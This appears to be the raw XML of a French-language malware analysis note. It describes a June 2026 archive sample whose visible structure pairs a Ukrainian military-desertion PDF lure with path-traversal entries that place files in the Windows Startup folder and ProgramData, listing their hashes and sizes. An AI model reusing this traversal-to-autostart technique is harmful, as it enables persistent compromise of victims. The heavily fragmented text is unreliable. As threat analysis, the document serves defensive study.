                          <a:moveTo>
                            <a:pt x="1206500" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="1236345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1236345"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1236345"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1236345"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="123634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324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3930659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205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127499" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="883284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883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="883284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883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="883284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88328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3657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4814579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9604" cy="1767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9604" h="1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1205865" y="883919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="883919"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4127499" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4127499" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4127499" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3253740" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4126865" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1206500" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3253105" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1206500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1206500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4784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5698499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="4060825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0608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060825">
                          <a:moveTo>
                            <a:pt x="0" y="3785235"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4060825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4060825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3785235"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3510280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3510280"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3785235"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3510280"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3235325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3510915"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3510915"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3235325"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2960370"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2960370"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3235325"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2960370"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2685415"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2961005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2961005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2685415"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2060575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2685415"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2060575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1050290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1050290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2060575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1050290"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="889635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889635"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1050925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1050925"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889635"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4128134" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4128134" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4128134" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3254375" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4127500" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4127500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3254375" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3254375" y="883285"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1207135" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="883285"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3253740" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1207135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1207135" y="8832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4988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2172344</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736589" cy="524513"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6589" cy="5245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6589" h="524510">
                          <a:moveTo>
                            <a:pt x="6350" y="524510"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="524510"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589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500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2169169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736589" cy="4419599"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6589" cy="4419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6589" h="4419599">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="4419599"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="4416425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589" y="4416425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3532505"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="3532505"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2648585"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2648585"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1764665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="176466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6032" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2106930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2175519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4406900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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406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406900">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="44069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8080" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4154170</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2175519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="873763" cy="4406900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3763" cy="4406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73759" h="4406900">
                          <a:moveTo>
                            <a:pt x="873759" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="873759" y="4406900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="44069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9104" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6630670</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2169169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4419599"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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419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419599">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="441959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2176" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4509135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7560319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0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4224" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3245485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7560319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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524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627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7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1223191" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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31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Note de l’analyste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8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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Lors de la recherche de nouveaux variants, un échantillon daté du 23 juin 2026 a été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9344" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6622338</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="114894" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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89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0368" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4803025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1392" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2813278</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1409088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="726932" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9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(condensat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2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649399" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3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découvert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3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1579510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5075425" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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754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420f1931af9b3f7d02c5edfc78eb69abdad6e71d2c3e9b81f9cbc3823a503654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4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1864383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1924441" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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44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Voici la structure de l'archive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5488" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4289425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2180613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="679968" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9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Taille (en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6512" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5186045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2266973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9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7536" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1015365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2266973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8560" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2393315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2266973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1512091" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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20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Chemin dans l'archive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9584" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4363085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2353968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="493378" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3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octets)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06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2699015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1245284" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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528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45"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Відомость про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16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2875545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="880522" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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052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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">самовільне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26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3052075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803687" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">залишення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3680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3147718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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4704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3147718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5728" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4190365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3147718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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67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3228605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="880522" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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052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38"/>
                          </w:rPr>
                          <w:t xml:space="preserve">військової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77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3405135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1171594" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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59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45"/>
                          </w:rPr>
                          <w:t xml:space="preserve">частини 3018-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88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3581665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1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31"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4726.pdf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9824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3935995</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">0a9bc91e7ea2c3931f6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0848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3941950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1209493" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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949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..\..\..\..\..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1872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4112130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1963873" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8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\Roaming\Microsoft\Wind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2896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4112525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">62eea37c00c7c26c899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39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4112525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">x3U_F_q1KeVOd3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4944" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4190365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4208168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="385411" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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41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1 203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5968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4282310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="874213" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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421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ows\Start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6992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4289055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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31"/>
                          </w:rPr>
                          <w:t xml:space="preserve">6b65f6f7afe6cce8f61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80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4289055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419030" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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0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43"/>
                          </w:rPr>
                          <w:t xml:space="preserve">_.lnk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9040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4452490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1880053" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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005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Menu\Programs\Startup\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0064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4465585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">14f94b6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1088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4819915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7dfaaac8d7759d47ef9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2112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4910960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1963873" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8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..\..\..\..\..\..\..\..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3136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4996445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4b28501f5e4dd33a302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4160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5081140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1041853" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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185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\..\..\..\..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51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5084710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">SNLk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6208" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4190365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5092088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="657127" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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712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1 134 592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7232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5172975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">fe54c69431673d5e0dd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8256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5251320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1125673" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6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\ProgramData\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9280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5349505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">7f7ac43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0304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5703835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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19"/>
                          </w:rPr>
                          <w:t xml:space="preserve">e7aa24a7ab391d1551b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1328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5794880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1963873" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8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..\..\..\..\..\..\..\..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2352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5880365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">c3d942e945cb96beea9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3376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5965060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1041853" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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185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\..\..\..\..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44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5968630</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="265639" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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63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-4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">W8d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5424" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4190365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5976008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="462944" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42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29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96 235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6448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6056895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">679d87f127b77268590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7472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2142489</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6135240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1125673" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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567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75"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">\ProgramData\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8496" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5063489</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6233425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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4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57"/>
                            <w:spacing w:val="20"/>
                          </w:rPr>
                          <w:t xml:space="preserve">734bc34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9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6833893</wp:posOffset>
            </wp:positionV>
